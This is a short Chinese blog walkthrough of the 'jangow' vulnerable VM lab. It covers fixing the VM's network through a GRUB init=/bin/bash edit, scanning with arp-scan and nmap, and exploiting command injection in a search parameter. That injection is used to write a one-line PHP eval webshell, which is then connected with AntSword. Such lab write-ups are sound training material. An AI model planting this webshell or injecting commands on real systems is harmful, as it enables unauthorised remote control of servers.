当前位置: 首页 > news >正文

jangow靶机攻略

配置网卡

VMware需要配置,不配置扫不到ip,VirtualBox正常打开ip会直接显示出来

网卡配置都改成NAT

打开虚拟机,第一个框选第二行,回车

选第二个,按e键 

进入下一个框后,将ro 后面的修改为= rw signin init=/bin/bash

按ctrl+x ,进入命令界面 

cd etc

cd network

ls

vim interfaces

 进入文件后,把网卡改成ens33

之后重启,打开后就不用管了

 开始攻略

扫描ip

arp-scan -l

 扫描端口

nmap -sV 

 访问80端口

点击site

各个功能点都试了之后,发现在右上角的buscar点击之后网页上会有参数

输入whoami,发现有回显,说明存在漏洞

输入一句话木马

echo '<?php eval($_POST["cmd"]);'  > 1.php

访问发现成功写入 

 尝试使用蚁剑连接

http://www.dtcms.com/a/88018.html

相关文章:

  • Vue.js 过滤器(Filters):简化文本格式化的利器
  • 第十四届蓝桥杯省赛电子类单片机学习记录(客观题)
  • 2025 JMeter平替的五款工具
  • 中间件框架漏洞攻略
  • 室分覆盖(室内分布系统)详解
  • 二叉搜索树的最近公共祖先 删除二叉搜索树中的节点 修剪二叉搜索树(Java)
  • ClickHouse怎么学习
  • 数据库—sql语法基础
  • 健身房管理系统(源码+数据库)
  • 《HarmonyOS Next自定义TabBar页签凸起和凹陷案例与代码》
  • chatshare.xyz和chatshare.biz的差别和渠道!
  • 【踩坑日记】IDEA的ctrl+r快捷键冲突无法使用
  • 前端如何用canvas来做电影院选票功能
  • K8S学习之基础四十七:k8s中部署fluentd
  • Java多线程与高并发专题——如何利用 CompletableFuture 解决“聚合打车服务平台”的问题?
  • 2.4 隐函数及由参数方程确定的函数求导
  • C#中值类型与引用类型是直观使用示例
  • __init__.py
  • openGauss关联列数据类型不一致引起谓词传递失败
  • fuse性能关键参数entry_timeout
  • python面试高频考点(深度学习大模型方向)
  • V8引擎源码编译踩坑实录
  • 如何在 Vue 项目中使用v - show和v - if指令,它们的原理、区别和适用场景是什么
  • jangow-01-1.0.1靶机攻略
  • QuecPython 外设接口之GPIO应用指南
  • java中的常量可以不用在声明的时候初始化,c中的必须在声明的时候初始化,可不可以这么理解?
  • HDMI(High-Definition Multimedia Interface)详解
  • 三分钟读懂微服务
  • UE4学习笔记 FPS游戏制作16 重构FppShooter和RoboteShooter 提出父类Shooter
  • HTML应用指南:利用POST请求获取城市肯德基门店位置信息